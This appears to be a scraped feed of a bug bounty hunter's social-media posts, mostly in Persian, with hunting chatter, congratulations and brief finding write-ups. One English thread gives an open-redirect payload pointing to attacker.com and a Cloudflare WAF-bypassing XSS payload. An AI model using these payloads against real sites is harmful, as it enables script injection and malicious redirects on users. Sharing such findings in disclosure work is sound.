sw-Amin

@MikeApt76 همینطوره داداشم... امیدوار یه یه روز بهتر

@sw_4min خدایی دارم دیوونه میشم از این وضعیت. این همه تلاش و پشتکار و استمرار و می‌ترسم همه‌ی اینا هیچ بشه.

دوستان هانتر ( باگ بانتی ) یه سوال: با این اینترنت داغون می‌تونید هانت کنید؟ الان یک ماهه که من نتونستم هانت کنم و این داره منو دیوونه می‌کنه. تا میرم رو تارگت و تا بشینم هانت کنم اصلا صفحه‌ load نمیشه 😑 هکروان رو هم که چی بگم!

@Muntrive @MrCherna 📿🔥

@voorivex شرکت پیام پرداز پیام از گروه خارج شد😂

فامیلیمو حداقل درست می‌نوشتی

@0xHo3ein0xploit @voorivex الله 🔥

Forever grateful for GUTS Course 📿 @voorivex

Final payload to bypass the WAF : /Path?reurl=javascript:var{x:onerror}%3d{x%3a%2561lert}%3bthrow%20origin//a.company.‌com [2/2] #xssbypass #bugbounty

[Bypass Cloudflare] Open Redirect to XSS I happened to run into this today Open Redirect: /Path?reurl=https‌://attacker.com%23a.‌company.c‌om ->redirect to attacker‌.com Escalate to xss: /Path?reurl=javascript:alert(origin) ->blocked by WAF [1/2]

@AtaTurk1925 Legends 🔥

Yo @LinkedIn fuck u

@intigriti Still finding

What was your first critical bug? 😎

@intigriti Idor, Bac

What's the easiest vulnerability type to find in 2025? 👀

@ER_eton قرص دقت @voorivex

دوستان بجز منیزیم و امگا ۳ و ویتامین دی، چی پیشنهاد میدین برای بی حالی و بی حوصلگی؟!

@x0xHasan 🔥🎉 congratulations

Alhamdulillah, got my 750+rep swag. Thanks to @Hacker0x01

@Saddamzzz65 Congratulations 🔥🎉

after 13 reports first valid report triaged on hackerone @Hacker0x01

@0xHo3ein0xploit @voorivex عالی 🔥

Still hunting, Still learning JS Just got a little more interesting today📿 @voorivex

@AtaTurk1925 یالله حاج نادر 🔥

قراره تو یه ایونت، تجربه‌هامون از هانت کردن روی متا(فیسبوک، اینستاگرام،...) و تکنولوژی‌هایی که متا استفاده می‌کنه ابزار های که توسعه داده شده رو باهاتون به اشتراک بذاریم! زمان لایو برا هفته آینده اس تایم دقیق هم خود چنل میذاریم. 📺 سه تا لایو داریم که با @p__oria ❤️ به‌صورت مشترک برگزار می‌شه. اگه دوست دارین تو لایوها شرکت کنین، فقط کافیه جوین سرور دیسکورد بدین link: discord.gg/gRgv3MBBv6

@safasafari3 این دیگه چه سمیه 😂

با تفنگ اسباب بازی میخواد منو بزنه آخییی =)))

منتظرتون بودم =)))

@0x04ft @Arian1949 🔥🔥🔥 به به

@YShahinzadeh Allah 🔥

This one was easy: searched JS files → revealing endpoints → JSON HTTP request → exposed PII. Tip: account for lazy-loading. many hunters miss endpoints. Method: click to trigger lazy-loaded JS, then search again for endpoints. Happy hunting :]

@yousefccfc @voorivex حاج جوزف ورود کرد 🔥🔥

1-click ATO via a postMessage flaw This is my 2nd ever finding and I’m really happy about it! The severity could be high, but I’m not letting that overshadow the joy of this bounty 😄 Huge thanks to @voorivex for teaching us this trick 🙌